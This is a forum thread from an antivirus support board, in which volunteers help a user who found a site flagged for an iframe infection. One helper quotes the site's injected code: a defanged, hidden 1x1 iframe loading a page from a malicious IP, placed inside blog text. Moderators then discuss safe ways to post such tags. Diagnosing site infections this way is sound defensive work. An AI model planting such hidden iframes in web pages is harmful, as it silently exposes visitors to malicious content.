Author Topic: Iframe-html and redirecting to another website on www.queenscentral.com  (Read 5109 times)

0 Members and 1 Guest are viewing this topic.

Offline aj023

  • Newbie
  • *
  • Posts: 1
www.queenscentral.com is giving me an error saying there is an iframe-html virus and gives me a Network Shield: blocked access to malicious site 74.222.134.170/stats.php?id=2 [ C:\Program Files\Mozilla Firefox\firefox.exe ( 5056 ) ]

I spoke to the webmaster who doesn't know how to remove this virus or even know he has it and didn't know about it till I mentioned it. 

I contacted the abuse @ the above IP address who I gave info on this to and he tells me he doesn't see anything on his end and says he contacted the owner of the IP to check his server. 

Can someone verify if there is an IFRAME-HTML manipulation here and what is going on? 
« Last Edit: May 02, 2009, 10:12:52 AM by aj023 »

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
***

Welcome to the forums, aj023.   :)

I checked the source code of the link you supplied. Here is the offending iframe infection :

<eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe>

I will post some of the other code before and after the iframe infection so it will be easier to find :

<p> </p>
<p>Here&#8217;s an <a href="hXXp://www.youtube.com/watch?v=-HazQlWgdzg" target="_blank">instructional video</a> to inform<!-- Web Stats --> <eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe> <!-- End Web Stats --> you about pickpocketing.</p>
<p> </p>

You can now report this to the webmaster and include a link to this thread. Use this link :

http://forum.avast.com/index.php?topic=44842.msg375383#msg375383

(code broken between the "2" and "width.")

In the code above :

eyeframe = iframe

XX = tt


***
« Last Edit: May 03, 2009, 07:36:58 AM by CharleyO »
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
***

Information about IP address 74.222.134.170  :

https://safeweb.norton.com/report/show?name=74.222.134.170


***
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM

Offline DavidR

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 81303
  • No support PMs thanks
CharelyO, You have to be careful in posting the actual iframe tag as it could result in this page actually being pinged by avast, that is generally why I post images of the tags/code.

Break it over two lines, etc. change the http to hXXp as usual, change the < and > characters to ^ so it can't be interpreted by a browser as a legit code and possibly be actioned, e.g. ^iframe^ ^/iframe^

The placement of an iframe within a sentence is in its own right is suspect.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.4.2374/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7087
  • Be alert for error code - ID 10T
***

OOPS ... thanks, David.    :-[

I will use images from now on.


***
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM

Offline DavidR

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 81303
  • No support PMs thanks
No problem, nice touch with changing it to eyeframe though; those who know will understand it is iframe ;D
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 19.4.2374/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ WinPatrol+/